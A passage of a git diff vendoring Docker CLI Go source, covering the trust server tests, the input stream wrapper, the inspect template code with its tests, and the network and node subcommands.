®istrytypes.IndexInfo{Name: "testserver", Official: true} + output, err := trust.Server(indexInfo) + if err != nil || output != registry.NotaryServer { + t.Fatalf("Expected server to be %s, got %s", registry.NotaryServer, output) + } +} + +func TestNonOfficialTrustServer(t *testing.T) { + indexInfo := ®istrytypes.IndexInfo{Name: "testserver", Official: false} + output, err := trust.Server(indexInfo) + expectedStr := "https://" + indexInfo.Name + if err != nil || output != expectedStr { + t.Fatalf("Expected server to be %s, got %s", expectedStr, output) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/in.go b/vendor/github.com/docker/docker/cli/command/in.go new file mode 100644 index 0000000000..7204b7ad04 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/in.go @@ -0,0 +1,75 @@ +package command + +import ( + "errors" + "io" + "os" + "runtime" + + "github.com/docker/docker/pkg/term" +) + +// InStream is an input stream used by the DockerCli to read user input +type InStream struct { + in io.ReadCloser + fd uintptr + isTerminal bool + state *term.State +} + +func (i *InStream) Read(p []byte) (int, error) { + return i.in.Read(p) +} + +// Close implements the Closer interface +func (i *InStream) Close() error { + return i.in.Close() +} + +// FD returns the file descriptor number for this stream +func (i *InStream) FD() uintptr { + return i.fd +} + +// IsTerminal returns true if this stream is connected to a terminal +func (i *InStream) IsTerminal() bool { + return i.isTerminal +} + +// SetRawTerminal sets raw mode on the input terminal +func (i *InStream) SetRawTerminal() (err error) { + if os.Getenv("NORAW") != "" || !i.isTerminal { + return nil + } + i.state, err = term.SetRawTerminal(i.fd) + return err +} + +// RestoreTerminal restores normal mode to the terminal +func (i *InStream) RestoreTerminal() { + if i.state != nil { + term.RestoreTerminal(i.fd, i.state) + } +} + +// CheckTty checks if we are trying to attach to a container tty +// from a non-tty client input stream, and if so, returns an error. +func (i *InStream) CheckTty(attachStdin, ttyMode bool) error { + // In order to attach to a container tty, input stream for the client must + // be a tty itself: redirecting or piping the client standard input is + // incompatible with `docker run -t`, `docker exec -t` or `docker attach`. + if ttyMode && attachStdin && !i.isTerminal { + eText := "the input device is not a TTY" + if runtime.GOOS == "windows" { + return errors.New(eText + ". If you are using mintty, try prefixing the command with 'winpty'") + } + return errors.New(eText) + } + return nil +} + +// NewInStream returns a new InStream object from a ReadCloser +func NewInStream(in io.ReadCloser) *InStream { + fd, isTerminal := term.GetFdInfo(in) + return &InStream{in: in, fd: fd, isTerminal: isTerminal} +} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go new file mode 100644 index 0000000000..1d81643fb1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go @@ -0,0 +1,195 @@ +package inspect + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "text/template" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cli" + "github.com/docker/docker/utils/templates" +) + +// Inspector defines an interface to implement to process elements +type Inspector interface { + Inspect(typedElement interface{}, rawElement []byte) error + Flush() error +} + +// TemplateInspector uses a text template to inspect elements. +type TemplateInspector struct { + outputStream io.Writer + buffer *bytes.Buffer + tmpl *template.Template +} + +// NewTemplateInspector creates a new inspector with a template. +func NewTemplateInspector(outputStream io.Writer, tmpl *template.Template) Inspector { + return &TemplateInspector{ + outputStream: outputStream, + buffer: new(bytes.Buffer), + tmpl: tmpl, + } +} + +// NewTemplateInspectorFromString creates a new TemplateInspector from a string +// which is compiled into a template. +func NewTemplateInspectorFromString(out io.Writer, tmplStr string) (Inspector, error) { + if tmplStr == "" { + return NewIndentedInspector(out), nil + } + + tmpl, err := templates.Parse(tmplStr) + if err != nil { + return nil, fmt.Errorf("Template parsing error: %s", err) + } + return NewTemplateInspector(out, tmpl), nil +} + +// GetRefFunc is a function which used by Inspect to fetch an object from a +// reference +type GetRefFunc func(ref string) (interface{}, []byte, error) + +// Inspect fetches objects by reference using GetRefFunc and writes the json +// representation to the output writer. +func Inspect(out io.Writer, references []string, tmplStr string, getRef GetRefFunc) error { + inspector, err := NewTemplateInspectorFromString(out, tmplStr) + if err != nil { + return cli.StatusError{StatusCode: 64, Status: err.Error()} + } + + var inspectErr error + for _, ref := range references { + element, raw, err := getRef(ref) + if err != nil { + inspectErr = err + break + } + + if err := inspector.Inspect(element, raw); err != nil { + inspectErr = err + break + } + } + + if err := inspector.Flush(); err != nil { + logrus.Errorf("%s\n", err) + } + + if inspectErr != nil { + return cli.StatusError{StatusCode: 1, Status: inspectErr.Error()} + } + return nil +} + +// Inspect executes the inspect template. +// It decodes the raw element into a map if the initial execution fails. +// This allows docker cli to parse inspect structs injected with Swarm fields. +func (i *TemplateInspector) Inspect(typedElement interface{}, rawElement []byte) error { + buffer := new(bytes.Buffer) + if err := i.tmpl.Execute(buffer, typedElement); err != nil { + if rawElement == nil { + return fmt.Errorf("Template parsing error: %v", err) + } + return i.tryRawInspectFallback(rawElement) + } + i.buffer.Write(buffer.Bytes()) + i.buffer.WriteByte('\n') + return nil +} + +// tryRawInspectFallback executes the inspect template with a raw interface. +// This allows docker cli to parse inspect structs injected with Swarm fields. +func (i *TemplateInspector) tryRawInspectFallback(rawElement []byte) error { + var raw interface{} + buffer := new(bytes.Buffer) + rdr := bytes.NewReader(rawElement) + dec := json.NewDecoder(rdr) + + if rawErr := dec.Decode(&raw); rawErr != nil { + return fmt.Errorf("unable to read inspect data: %v", rawErr) + } + + tmplMissingKey := i.tmpl.Option("missingkey=error") + if rawErr := tmplMissingKey.Execute(buffer, raw); rawErr != nil { + return fmt.Errorf("Template parsing error: %v", rawErr) + } + + i.buffer.Write(buffer.Bytes()) + i.buffer.WriteByte('\n') + return nil +} + +// Flush writes the result of inspecting all elements into the output stream. +func (i *TemplateInspector) Flush() error { + if i.buffer.Len() == 0 { + _, err := io.WriteString(i.outputStream, "\n") + return err + } + _, err := io.Copy(i.outputStream, i.buffer) + return err +} + +// IndentedInspector uses a buffer to stop the indented representation of an element. +type IndentedInspector struct { + outputStream io.Writer + elements []interface{} + rawElements [][]byte +} + +// NewIndentedInspector generates a new IndentedInspector. +func NewIndentedInspector(outputStream io.Writer) Inspector { + return &IndentedInspector{ + outputStream: outputStream, + } +} + +// Inspect writes the raw element with an indented json format. +func (i *IndentedInspector) Inspect(typedElement interface{}, rawElement []byte) error { + if rawElement != nil { + i.rawElements = append(i.rawElements, rawElement) + } else { + i.elements = append(i.elements, typedElement) + } + return nil +} + +// Flush writes the result of inspecting all elements into the output stream. +func (i *IndentedInspector) Flush() error { + if len(i.elements) == 0 && len(i.rawElements) == 0 { + _, err := io.WriteString(i.outputStream, "[]\n") + return err + } + + var buffer io.Reader + if len(i.rawElements) > 0 { + bytesBuffer := new(bytes.Buffer) + bytesBuffer.WriteString("[") + for idx, r := range i.rawElements { + bytesBuffer.Write(r) + if idx < len(i.rawElements)-1 { + bytesBuffer.WriteString(",") + } + } + bytesBuffer.WriteString("]") + indented := new(bytes.Buffer) + if err := json.Indent(indented, bytesBuffer.Bytes(), "", " "); err != nil { + return err + } + buffer = indented + } else { + b, err := json.MarshalIndent(i.elements, "", " ") + if err != nil { + return err + } + buffer = bytes.NewReader(b) + } + + if _, err := io.Copy(i.outputStream, buffer); err != nil { + return err + } + _, err := io.WriteString(i.outputStream, "\n") + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go new file mode 100644 index 0000000000..1ce1593ab7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go @@ -0,0 +1,221 @@ +package inspect + +import ( + "bytes" + "strings" + "testing" + + "github.com/docker/docker/utils/templates" +) + +type testElement struct { + DNS string `json:"Dns"` +} + +func TestTemplateInspectorDefault(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.DNS}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "0.0.0.0\n" { + t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) + } +} + +func TestTemplateInspectorEmpty(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.DNS}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "\n" { + t.Fatalf("Expected `\\n`, got `%s`", b.String()) + } +} + +func TestTemplateInspectorTemplateError(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.Foo}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + + err = i.Inspect(testElement{"0.0.0.0"}, nil) + if err == nil { + t.Fatal("Expected error got nil") + } + + if !strings.HasPrefix(err.Error(), "Template parsing error") { + t.Fatalf("Expected template error, got %v", err) + } +} + +func TestTemplateInspectorRawFallback(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.Dns}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0"}`)); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "0.0.0.0\n" { + t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) + } +} + +func TestTemplateInspectorRawFallbackError(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.Dns}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + err = i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Foo": "0.0.0.0"}`)) + if err == nil { + t.Fatal("Expected error got nil") + } + + if !strings.HasPrefix(err.Error(), "Template parsing error") { + t.Fatalf("Expected template error, got %v", err) + } +} + +func TestTemplateInspectorMultiple(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.DNS}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "0.0.0.0\n1.1.1.1\n" { + t.Fatalf("Expected `0.0.0.0\\n1.1.1.1\\n`, got `%s`", b.String()) + } +} + +func TestIndentedInspectorDefault(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := `[ + { + "Dns": "0.0.0.0" + } +] +` + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} + +func TestIndentedInspectorMultiple(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := `[ + { + "Dns": "0.0.0.0" + }, + { + "Dns": "1.1.1.1" + } +] +` + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} + +func TestIndentedInspectorEmpty(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := "[]\n" + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} + +func TestIndentedInspectorRawElements(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0", "Node": "0"}`)); err != nil { + t.Fatal(err) + } + + if err := i.Inspect(testElement{"1.1.1.1"}, []byte(`{"Dns": "1.1.1.1", "Node": "1"}`)); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := `[ + { + "Dns": "0.0.0.0", + "Node": "0" + }, + { + "Dns": "1.1.1.1", + "Node": "1" + } +] +` + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/network/cmd.go b/vendor/github.com/docker/docker/cli/command/network/cmd.go new file mode 100644 index 0000000000..ab8393cded --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/cmd.go @@ -0,0 +1,28 @@ +package network + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewNetworkCommand returns a cobra command for `network` subcommands +func NewNetworkCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "network", + Short: "Manage networks", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newConnectCommand(dockerCli), + newCreateCommand(dockerCli), + newDisconnectCommand(dockerCli), + newInspectCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/network/connect.go b/vendor/github.com/docker/docker/cli/command/network/connect.go new file mode 100644 index 0000000000..c4b676e5f1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/connect.go @@ -0,0 +1,64 @@ +package network + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type connectOptions struct { + network string + container string + ipaddress string + ipv6address string + links opts.ListOpts + aliases []string + linklocalips []string +} + +func newConnectCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := connectOptions{ + links: opts.NewListOpts(runconfigopts.ValidateLink), + } + + cmd := &cobra.Command{ + Use: "connect [OPTIONS] NETWORK CONTAINER", + Short: "Connect a container to a network", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.network = args[0] + opts.container = args[1] + return runConnect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVar(&opts.ipaddress, "ip", "", "IP Address") + flags.StringVar(&opts.ipv6address, "ip6", "", "IPv6 Address") + flags.Var(&opts.links, "link", "Add link to another container") + flags.StringSliceVar(&opts.aliases, "alias", []string{}, "Add network-scoped alias for the container") + flags.StringSliceVar(&opts.linklocalips, "link-local-ip", []string{}, "Add a link-local address for the container") + + return cmd +} + +func runConnect(dockerCli *command.DockerCli, opts connectOptions) error { + client := dockerCli.Client() + + epConfig := &network.EndpointSettings{ + IPAMConfig: &network.EndpointIPAMConfig{ + IPv4Address: opts.ipaddress, + IPv6Address: opts.ipv6address, + LinkLocalIPs: opts.linklocalips, + }, + Links: opts.links.GetAll(), + Aliases: opts.aliases, + } + + return client.NetworkConnect(context.Background(), opts.network, opts.container, epConfig) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/create.go b/vendor/github.com/docker/docker/cli/command/network/create.go new file mode 100644 index 0000000000..abc494e1e0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/create.go @@ -0,0 +1,226 @@ +package network + +import ( + "fmt" + "net" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type createOptions struct { + name string + driver string + driverOpts opts.MapOpts + labels opts.ListOpts + internal bool + ipv6 bool + attachable bool + + ipamDriver string + ipamSubnet []string + ipamIPRange []string + ipamGateway []string + ipamAux opts.MapOpts + ipamOpt opts.MapOpts +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := createOptions{ + driverOpts: *opts.NewMapOpts(nil, nil), + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + ipamAux: *opts.NewMapOpts(nil, nil), + ipamOpt: *opts.NewMapOpts(nil, nil), + } + + cmd := &cobra.Command{ + Use: "create [OPTIONS] NETWORK", + Short: "Create a network", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.name = args[0] + return runCreate(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.driver, "driver", "d", "bridge", "Driver to manage the Network") + flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") + flags.Var(&opts.labels, "label", "Set metadata on a network") + flags.BoolVar(&opts.internal, "internal", false, "Restrict external access to the network") + flags.BoolVar(&opts.ipv6, "ipv6", false, "Enable IPv6 networking") + flags.BoolVar(&opts.attachable, "attachable", false, "Enable manual container attachment") + + flags.StringVar(&opts.ipamDriver, "ipam-driver", "default", "IP Address Management Driver") + flags.StringSliceVar(&opts.ipamSubnet, "subnet", []string{}, "Subnet in CIDR format that represents a network segment") + flags.StringSliceVar(&opts.ipamIPRange, "ip-range", []string{}, "Allocate container ip from a sub-range") + flags.StringSliceVar(&opts.ipamGateway, "gateway", []string{}, "IPv4 or IPv6 Gateway for the master subnet") + + flags.Var(&opts.ipamAux, "aux-address", "Auxiliary IPv4 or IPv6 addresses used by Network driver") + flags.Var(&opts.ipamOpt, "ipam-opt", "Set IPAM driver specific options") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts createOptions) error { + client := dockerCli.Client() + + ipamCfg, err := consolidateIpam(opts.ipamSubnet, opts.ipamIPRange, opts.ipamGateway, opts.ipamAux.GetAll()) + if err != nil { + return err + } + + // Construct network create request body + nc := types.NetworkCreate{ + Driver: opts.driver, + Options: opts.driverOpts.GetAll(), + IPAM: &network.IPAM{ + Driver: opts.ipamDriver, + Config: ipamCfg, + Options: opts.ipamOpt.GetAll(), + }, + CheckDuplicate: true, + Internal: opts.internal, + EnableIPv6: opts.ipv6, + Attachable: opts.attachable, + Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), + } + + resp, err := client.NetworkCreate(context.Background(), opts.name, nc) + if err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "%s\n", resp.ID) + return nil +} + +// Consolidates the ipam configuration as a group from different related configurations +// user can configure network with multiple non-overlapping subnets and hence it is +// possible to correlate the various related parameters and consolidate them. +// consoidateIpam consolidates subnets, ip-ranges, gateways and auxiliary addresses into +// structured ipam data. +func consolidateIpam(subnets, ranges, gateways []string, auxaddrs map[string]string) ([]network.IPAMConfig, error) { + if len(subnets) < len(ranges) || len(subnets) < len(gateways) { + return nil, fmt.Errorf("every ip-range or gateway must have a corresponding subnet") + } + iData := map[string]*network.IPAMConfig{} + + // Populate non-overlapping subnets into consolidation map + for _, s := range subnets { + for k := range iData { + ok1, err := subnetMatches(s, k) + if err != nil { + return nil, err + } + ok2, err := subnetMatches(k, s) + if err != nil { + return nil, err + } + if ok1 || ok2 { + return nil, fmt.Errorf("multiple overlapping subnet configuration is not supported") + } + } + iData[s] = &network.IPAMConfig{Subnet: s, AuxAddress: map[string]string{}} + } + + // Validate and add valid ip ranges + for _, r := range ranges { + match := false + for _, s := range subnets { + ok, err := subnetMatches(s, r) + if err != nil { + return nil, err + } + if !ok { + continue + } + if iData[s].IPRange != "" { + return nil, fmt.Errorf("cannot configure multiple ranges (%s, %s) on the same subnet (%s)", r, iData[s].IPRange, s) + } + d := iData[s] + d.IPRange = r + match = true + } + if !match { + return nil, fmt.Errorf("no matching subnet for range %s", r) + } + } + + // Validate and add valid gateways + for _, g := range gateways { + match := false + for _, s := range subnets { + ok, err := subnetMatches(s, g) + if err != nil { + return nil, err + } + if !ok { + continue + } + if iData[s].Gateway != "" { + return nil, fmt.Errorf("cannot configure multiple gateways (%s, %s) for the same subnet (%s)", g, iData[s].Gateway, s) + } + d := iData[s] + d.Gateway = g + match = true + } + if !match { + return nil, fmt.Errorf("no matching subnet for gateway %s", g) + } + } + + // Validate and add aux-addresses + for key, aa := range auxaddrs { + match := false + for _, s := range subnets { + ok, err := subnetMatches(s, aa) + if err != nil { + return nil, err + } + if !ok { + continue + } + iData[s].AuxAddress[key] = aa + match = true + } + if !match { + return nil, fmt.Errorf("no matching subnet for aux-address %s", aa) + } + } + + idl := []network.IPAMConfig{} + for _, v := range iData { + idl = append(idl, *v) + } + return idl, nil +} + +func subnetMatches(subnet, data string) (bool, error) { + var ( + ip net.IP + ) + + _, s, err := net.ParseCIDR(subnet) + if err != nil { + return false, fmt.Errorf("Invalid subnet %s : %v", s, err) + } + + if strings.Contains(data, "/") { + ip, _, err = net.ParseCIDR(data) + if err != nil { + return false, fmt.Errorf("Invalid cidr %s : %v", data, err) + } + } else { + ip = net.ParseIP(data) + } + + return s.Contains(ip), nil +} diff --git a/vendor/github.com/docker/docker/cli/command/network/disconnect.go b/vendor/github.com/docker/docker/cli/command/network/disconnect.go new file mode 100644 index 0000000000..c9d9c14a13 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/disconnect.go @@ -0,0 +1,41 @@ +package network + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type disconnectOptions struct { + network string + container string + force bool +} + +func newDisconnectCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := disconnectOptions{} + + cmd := &cobra.Command{ + Use: "disconnect [OPTIONS] NETWORK CONTAINER", + Short: "Disconnect a container from a network", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.network = args[0] + opts.container = args[1] + return runDisconnect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force the container to disconnect from a network") + + return cmd +} + +func runDisconnect(dockerCli *command.DockerCli, opts disconnectOptions) error { + client := dockerCli.Client() + + return client.NetworkDisconnect(context.Background(), opts.network, opts.container, opts.force) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/inspect.go b/vendor/github.com/docker/docker/cli/command/network/inspect.go new file mode 100644 index 0000000000..1a86855f71 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/inspect.go @@ -0,0 +1,45 @@ +package network + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + names []string +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] NETWORK [NETWORK...]", + Short: "Display detailed information on one or more networks", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.names = args + return runInspect(dockerCli, opts) + }, + } + + cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + + ctx := context.Background() + + getNetFunc := func(name string) (interface{}, []byte, error) { + return client.NetworkInspectWithRaw(ctx, name) + } + + return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getNetFunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/list.go b/vendor/github.com/docker/docker/cli/command/network/list.go new file mode 100644 index 0000000000..1a5d285103 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/list.go @@ -0,0 +1,76 @@ +package network + +import ( + "sort" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type byNetworkName []types.NetworkResource + +func (r byNetworkName) Len() int { return len(r) } +func (r byNetworkName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byNetworkName) Less(i, j int) bool { return r[i].Name < r[j].Name } + +type listOptions struct { + quiet bool + noTrunc bool + format string + filter opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List networks", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display network IDs") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate the output") + flags.StringVar(&opts.format, "format", "", "Pretty-print networks using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'driver=bridge')") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + options := types.NetworkListOptions{Filters: opts.filter.Value()} + networkResources, err := client.NetworkList(context.Background(), options) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().NetworksFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().NetworksFormat + } else { + format = formatter.TableFormatKey + } + } + + sort.Sort(byNetworkName(networkResources)) + + networksCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewNetworkFormat(format, opts.quiet), + Trunc: !opts.noTrunc, + } + return formatter.NetworkWrite(networksCtx, networkResources) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/prune.go b/vendor/github.com/docker/docker/cli/command/network/prune.go new file mode 100644 index 0000000000..9f1979e6b5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/prune.go @@ -0,0 +1,73 @@ +package network + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool +} + +// NewPruneCommand returns a new cobra prune command for networks +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove all unused networks", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + + return cmd +} + +const warning = `WARNING! This will remove all networks not used by at least one container. +Are you sure you want to continue?` + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (output string, err error) { + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().NetworksPrune(context.Background(), filters.Args{}) + if err != nil { + return + } + + if len(report.NetworksDeleted) > 0 { + output = "Deleted Networks:\n" + for _, id := range report.NetworksDeleted { + output += id + "\n" + } + } + + return +} + +// RunPrune calls the Network Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { + output, err := runPrune(dockerCli, pruneOptions{force: true}) + return 0, output, err +} diff --git a/vendor/github.com/docker/docker/cli/command/network/remove.go b/vendor/github.com/docker/docker/cli/command/network/remove.go new file mode 100644 index 0000000000..2034b8709e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/remove.go @@ -0,0 +1,43 @@ +package network + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "rm NETWORK [NETWORK...]", + Aliases: []string{"remove"}, + Short: "Remove one or more networks", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args) + }, + } +} + +func runRemove(dockerCli *command.DockerCli, networks []string) error { + client := dockerCli.Client() + ctx := context.Background() + status := 0 + + for _, name := range networks { + if err := client.NetworkRemove(ctx, name); err != nil { + fmt.Fprintf(dockerCli.Err(), "%s\n", err) + status = 1 + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + + if status != 0 { + return cli.StatusError{StatusCode: status} + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/cmd.go b/vendor/github.com/docker/docker/cli/command/node/cmd.go new file mode 100644 index 0000000000..e71b9199ad --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/cmd.go @@ -0,0 +1,43 @@ +package node + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + apiclient "github.com/docker/docker/client" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +// NewNodeCommand returns a cobra command for `node` subcommands +func NewNodeCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "node", + Short: "Manage Swarm nodes", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newDemoteCommand(dockerCli), + newInspectCommand(dockerCli), + newListCommand(dockerCli), + newPromoteCommand(dockerCli), + newRemoveCommand(dockerCli), + newPsCommand(dockerCli), + newUpdateCommand(dockerCli), + ) + return cmd +} + +// Reference returns the reference of a node. The special value "self" for a node +// reference is mapped to the current node, hence the node ID is retrieved using +// the `/info` endpoint. +func Reference(ctx context.Context, client apiclient.APIClient, ref string) (string, error) { + if ref == "self" { + info, err := client.Info(ctx) + if err != nil { + return "", err + } + return info.Swarm.NodeID, nil + } + return ref, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/demote.go 